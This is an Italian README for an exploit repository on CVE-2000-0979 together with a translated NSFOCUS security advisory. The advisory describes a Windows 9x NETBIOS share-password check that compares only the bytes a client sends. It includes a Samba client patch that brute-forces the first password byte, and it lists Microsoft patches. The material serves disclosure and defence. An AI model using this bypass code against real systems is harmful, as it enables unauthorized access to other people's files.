
CVE-2000-0979
CVE-2000-0979.rb è lo strumento autonomo per sfruttare la CVE-2000-0979 contro il servizio SMB di Windows 95.
msf_2000_0979.rb è il modulo Metasploit. Puoi copiarlo in metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

Ulteriore documentazione in arrivo!
NSFOCUS Security Advisory(SA2000-05)
Topic: Vulnerabilità nella verifica della password NETBIOS di Microsoft Windows 9x
Data di rilascio: 24 agosto 2000 Data di aggiornamento: 11 ottobre 2000
Esiste una vulnerabilità nello schema di verifica della password utilizzato dall'implementazione del protocollo NETBIOS di Microsoft Windows 9x. Questa vulnerabilità consente a qualsiasi utente di accedere al servizio di condivisione file di Windows 9x protetto da password. L'attaccante non deve conoscere la password della condivisione.
È possibile impostare una password per proteggere le risorse condivise del sistema Microsoft Windows 9x. Tuttavia, esiste una vulnerabilità nello schema di verifica della password utilizzato dall'implementazione del protocollo NETBIOS di Microsoft Windows 9x. Per verificare la password, la lunghezza della password dipende dalla lunghezza dei dati inviati dal client al server. In altre parole, se un client imposta la lunghezza della password a un byte e invia il pacchetto con la password in chiaro al server, il server la confronterà solo con il primo byte della password condivisa (in chiaro) e, se corrisponde, il processo di verifica è completato. Tutto ciò che un attaccante deve fare è indovinare e provare il primo byte della password sulla vittima. Anche il sistema di gestione remota di Windows 9x è interessato perché adotta lo stesso metodo di autenticazione tramite password condivisa.
Ecco un semplice esempio per dimostrare questo bug. Ottieni il pacchetto sorgente di samba e modifica source/client/client.c in questo modo:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Chiudi il servizio di condivisione file e stampanti di Microsoft.
Microsoft è stata informata e ha rilasciato un bollettino di sicurezza relativo a questa falla.
Il bollettino è disponibile all'indirizzo :
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
Le patch sono disponibili ai seguenti indirizzi:
. Microsoft Windows 95
Patch disponibile a breve
. Microsoft Windows 98 e 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
LE INFORMAZIONI FORNITE SONO RILASCIATE DA NSFOCUS "COSÌ COME SONO" SENZA ALCUN TIPO DI GARANZIA. NSFOCUS DECLINA OGNI GARANZIA, ESPRESSA O IMPLICITA, ECCETTO LA GARANZIA DI COMMERCIABILITÀ. IN NESSUN CASO NSFOCUS SARÀ RESPONSABILE PER DANNI DI QUALSIASI NATURA, INCLUDENDO DANNI DIRETTI, INDIRETTI, INCIDENTALI, CONSEQUENZIALI, PERDITA DI PROFITTI COMMERCIALI O DANNI SPECIALI, ANCHE SE NSFOCUS È STATA AVVISATA DELLA POSSIBILITÀ DI TALI DANNI. LA DISTRIBUZIONE O LA RIPRODUZIONE DELLE INFORMAZIONI È CONSENTITA A CONDIZIONE CHE L'ADVISORY NON VENGA MODIFICATO IN NESSUN MODO.
?Copyright 1999-2000 NSFOCUS. Tutti i diritti riservati. Termini di utilizzo.
NSFOCUS Security Team [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)